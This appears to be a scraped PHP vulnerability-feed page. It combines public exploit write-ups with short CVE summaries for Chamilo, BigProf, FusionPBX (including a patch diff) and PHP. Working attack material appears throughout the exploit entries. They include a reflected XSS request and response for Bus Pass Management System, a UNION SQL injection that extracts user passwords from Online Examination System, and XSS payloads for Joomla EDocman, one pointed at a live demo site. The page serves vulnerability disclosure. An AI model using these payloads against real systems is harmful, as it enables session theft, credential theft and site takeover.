Bus Pass Management System version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Bus Pass Management System 1.0 - 'searchdata' Cross-Site Scripting (XSS)# Date: 2022-07-02# Exploit Author: Ali Alipour# Vendor Homepage: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql# Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip# Version: 1.0# Tested on: Windows 10 Pro x64 - XAMPP Server# CVE : N/A#Issue Detail:The value of the searchdata request parameter is copied into the HTML document as plain text between tags. The payload cyne7<script>alert(1)</script>yhltm was submitted in the searchdata parameter. This input was echoed unmodified in the application's response.This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.# Vulnerable page: /buspassms/download-pass.php# Vulnerable Parameter: searchdata [ POST Data ]#Request : POST /buspassms/download-pass.php HTTP/1.1Host: 127.0.0.1Cookie: PHPSESSID=s5iomgj8g4gj5vpeeef6qfb0b3Origin: https://127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Referer: https://127.0.0.1/buspassms/download-pass.phpContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateAccept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36Connection: closeCache-Control: max-age=0Content-Length: 25searchdata=966196cyne7%3cscript%3ealert(1)%3c%2fscript%3eyhltm&search=#Response : HTTP/1.1 200 OKDate: Fri, 01 Jul 2022 00:14:25 GMTServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.8X-Powered-By: PHP/7.4.8Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 6425Connection: closeContent-Type: text/html; charset=UTF-8<!DOCTYPE html><html lang="en"><head><title>Bus Pass Management System || Pass Page</title><script type="application/x-javascript"> addEventListener("load", function() { setTimeout(hideURLba...[SNIP]...<h4 style="padding-bottom: 20px;">Result against "966196cyne7<script>alert(1)</script>yhltm" keyword </h4>...[SNIP]...

Bus Pass Management System 1.0 Cross Site Scripting

Online Examination System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Online Examination System - SQL Injection# Google Dork: N/A# Date: 2022-9-28# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-examination/# Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip# Tested on: windows 11 - XAMPP# CVE : N/A# Version: 1.0Vulnerability Details======================Steps :vulnerable code in file account.php<?phpif(@$_GET['q']== 'quiz' && @$_GET['step']== 2) {$eid=@$_GET['eid'];$q=mysqli_query($con,"SELECT * FROM questions WHERE eid='$eid' AND sn='$sn' " );echo '<div class="panel" style="margin:5%">';while($row=mysqli_fetch_array($q) )?>1) Log in to the application after register new userinject payload paramter eid => eid=5589741f9ed52' union select 1,2,password,4,5 from user--

Online Examination System 1.0 SQL Injection

Joomla EDocman extension version 1.23.3 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : Ossolution Team                                                            ││  Software : EDocman 1.23.3 Extension for Joomla - Reflected XSS                        ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘GET parameter 'filter_search' is vulnerable to XSSPath: index.php/edocman-layouts/categories-layouts/tree-view/search-result?filter_category_id=1&filter_search=[XSS]https://joomdonationdemo.com/edocman/index.php/edocman-layouts/categories-layouts/tree-view/search-result?filter_category_id=1&filter_search=ekmj6"onfocus="alert(1)"autofocus="fjozn[-] Done

Joomla EDocman 1.23.3 Cross Site Scripting

Online Examination System version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Online Examination System - Cross site scripting Reflected# Google Dork: N/A# Date: 2022-9-29# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-examination/# Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip# Tested on: windows 11 - XAMPP# CVE : N/A# Version: 1.0Vulnerability Details======================Steps :vulnerable code in file index.php157 <?php if(@$_GET['q7'])158 { echo'<p style="color:red;font-size:15px;">'.@$_GET['q7'];}?>http://localhost/examination/index.php?q7=%22%3E%3Cscript%3Ealert(%22yousef%22);%3C/script%3Einject payload parameter q7

Online Examination System 1.0 Cross Site Scripting

A zip slip vulnerability in the file upload function of Chamilo v1.11 allows attackers to execute arbitrary code via a crafted Zip file.

CVE-2022-40407: Security issues - Chamilo LMS

BigProf Online Invoicing System before 2.9 suffers from an unauthenticated SQL Injection found in /membership_passwordReset.php (the endpoint that is responsible for issuing self-service password resets). An unauthenticated attacker is able to send a request containing a crafted payload that can result in sensitive information being extracted from the database, eventually leading into an application takeover. This vulnerability was introduced as a result of the developer trying to roll their own sanitization implementation in order to allow the application to be used in legacy environments.

CVE-2020-35674

BigProf Online Invoicing System before 3.0 offers a functionality that allows an administrator to move the records of members across groups. The applicable endpoint (admin/pageTransferOwnership.php) lacks CSRF protection, resulting in an attacker being able to escalate their privileges to Administrator and effectively taking over the application.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   *   By Plan
    *   Enterprise
    *   Teams
    *   Compare all
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

CVE-2020-35675: Release 3.0 · bigprof-software/online-invoicing-system

An issue was discovered in FusionPBX before 4.5.30. The log_viewer.php Log View page allows an authenticated user to choose an arbitrary filename for download (i.e., not necessarily freeswitch.log in the intended directory).

@@ -17,7 +17,7 @@ The Initial Developer of the Original Code is Mark J Crane <markjcrane@fusionpbx.com> Portions created by the Initial Developer are Copyright (C) 2008-2019 Portions created by the Initial Developer are Copyright (C) 2008-2021 the Initial Developer. All Rights Reserved. Contributor(s): @@ -44,32 +44,57 @@ $text = $language\->get();  
//set a default line number value (off) if (!isset($\_POST\['line\_number'\]) || $\_POST\['line\_number'\] == '') { $\_POST\['line\_number'\] = 0; } if (!isset($\_POST\['line\_number'\]) || $\_POST\['line\_number'\] == '') { $\_POST\['line\_number'\] = 0; }  
//set a default ordinal (descending) if (!isset($\_POST\['sort'\]) || $\_POST\['sort'\] == '') { $\_POST\['sort'\] = "asc"; } if (!isset($\_POST\['sort'\]) || $\_POST\['sort'\] == '') { $\_POST\['sort'\] = "asc"; }  
//set a default file size if (!isset($\_POST\['size'\]) || strlen($\_POST\['size'\]) == 0) { $\_POST\['size'\] = "32"; } if (!isset($\_POST\['size'\]) || strlen($\_POST\['size'\]) == 0) { $\_POST\['size'\] = "32"; }  
//set a default filter if (!isset($\_POST\['filter'\])) { $\_POST\['filter'\] = ""; } if (!isset($\_POST\['filter'\])) { $\_POST\['filter'\] = ''; }  
//set default default log file if (!isset($\_POST\['log\_file'\]) || substr($\_POST\['log\_file'\],0,14) != "freeswitch.log") { $\_POST\['log\_file'\] = "freeswitch.log"; } if (isset($\_POST\['log\_file'\])) { $approved\_files = glob($\_SESSION\['switch'\]\['log'\]\['dir'\].'/freeswitch.log\*'); foreach($approved\_files as $approved\_file) { if ($approved\_file == $\_SESSION\['switch'\]\['log'\]\['dir'\].'/'.$\_POST\['log\_file'\]) { $log\_file = $approved\_file; } } } else { $log\_file = $\_SESSION\['switch'\]\['log'\]\['dir'\].'/freeswitch.log'; }  
//download the log if (permission\_exists('log\_download')) { if (isset($\_GET\['n'\]) && substr($\_GET\['n'\],0,14) == "freeswitch.log") { $dir = $\_SESSION\['switch'\]\['log'\]\['dir'\]; $filename = $\_GET\['n'\]; session\_cache\_limiter('public'); $fd = fopen($dir."/".$filename, "rb"); header("Content-Type: binary/octet-stream"); header("Content-Length: " . filesize($tmp."/".$filename)); header('Content-Disposition: attachment; filename="'.$filename.'"'); fpassthru($fd); exit; if (isset($\_GET\['n'\])) { if (isset($filename)) { unset($filename); } $approved\_files = glob($\_SESSION\['switch'\]\['log'\]\['dir'\].'/freeswitch.log\*'); foreach($approved\_files as $approved\_file) { if ($approved\_file == $\_SESSION\['switch'\]\['log'\]\['dir'\].'/'.$\_GET\['n'\]) { $filename = $approved\_file; } } if (isset($filename) && file\_exists($filename)) { session\_cache\_limiter('public'); $fd = fopen($filename, "rb"); header("Content-Type: binary/octet-stream"); header("Content-Length: " . filesize($filename)); header('Content-Disposition: attachment; filename="'.basename($filename).'"'); fpassthru($fd); exit; } } }  
@@ -83,10 +108,10 @@ echo " <div class='actions'>\\n"; echo "<form name='frm' id='frm' class='inline' method='post'>\\n"; echo " ".$text\['label-log\_file'\]." <select name='log\_file' class='formfld' style='width: 150px; margin-right: 20px;'>"; $files = scandir($\_SESSION\['switch'\]\['log'\]\['dir'\]); foreach($files as $file) if (substr($file,0,14) == "freeswitch.log") { $selected = ($file == $\_POST\['log\_file'\]) ? "selected='selected'" : ""; echo " <option value='".$file."'".$selected."\>".$file."</option>"; $files = glob($\_SESSION\['switch'\]\['log'\]\['dir'\].'/freeswitch.log\*'); foreach($files as $file) { $selected = ($file == $log\_file) ? "selected='selected'" : ""; echo " <option value='".basename($file)."'".$selected."\>".basename($file)."</option>"; } echo " </select>\\n"; echo $text\['label-filter'\]." <input type='text' name='filter' class='formfld' style='width: 150px; text-align: center; margin-right: 20px;' value=\\"".escape($\_POST\['filter'\])."\\" onclick='this.select();'>"; @@ -95,7 +120,7 @@ echo $text\['label-display'\]." <input type='text' class='formfld' style='width: 50px; text-align: center;' name='size' value=\\"".escape($\_POST\['size'\])."\\" onclick='this.select();'> ".$text\['label-size'\]; echo button::create(\['type'\=>'submit','label'\=>$text\['button-update'\],'icon'\=>$\_SESSION\['theme'\]\['button\_icon\_save'\],'style'\=>'margin-left: 15px;','name'\=>'submit'\]); if (permission\_exists('log\_download')) { echo button::create(\['type'\=>'button','label'\=>$text\['button-download'\],'icon'\=>$\_SESSION\['theme'\]\['button\_icon\_download'\],'style'\=>'margin-left: 15px;','link'\=>'log\_viewer.php?a=download&n='.$\_POST\['log\_file'\]\]); echo button::create(\['type'\=>'button','label'\=>$text\['button-download'\],'icon'\=>$\_SESSION\['theme'\]\['button\_icon\_download'\],'style'\=>'margin-left: 15px;','link'\=>'log\_viewer.php?a=download&n='.basename($log\_file)\]); } echo "</form>\\n"; echo " </div>\\n"; @@ -115,9 +140,6 @@ $default\_type = 'normal'; $default\_font = 'monospace'; $default\_file\_size = '512000'; if (substr($\_POST\['log\_file'\],0,14) == "freeswitch.log") { $log\_file = $\_SESSION\['switch'\]\['log'\]\['dir'\]."/".$\_POST\['log\_file'\]; }  
//put the color matches here... $array\_filter\[0\]\['pattern'\] = '\[NOTICE\]'; @@ -296,4 +318,4 @@ //include the footer require\_once "resources/footer.php";  
?> ?>

CVE-2021-43403: Add better log filename validation. · fusionpbx/fusionpbx@57b7bf0

In PHP versions before 7.4.31, 8.0.24 and 8.1.11, the vulnerability enables network and same-site attackers to set a standard insecure cookie in the victim's browser which is treated as a `__Host-` or `__Secure-` cookie by PHP applications.

CVE-2022-31629: You must be logged in

In PHP versions before 7.4.31, 8.0.24 and 8.1.11, the phar uncompressor code would recursively uncompress "quines" gzip files, resulting in an infinite loop.

Tag

#php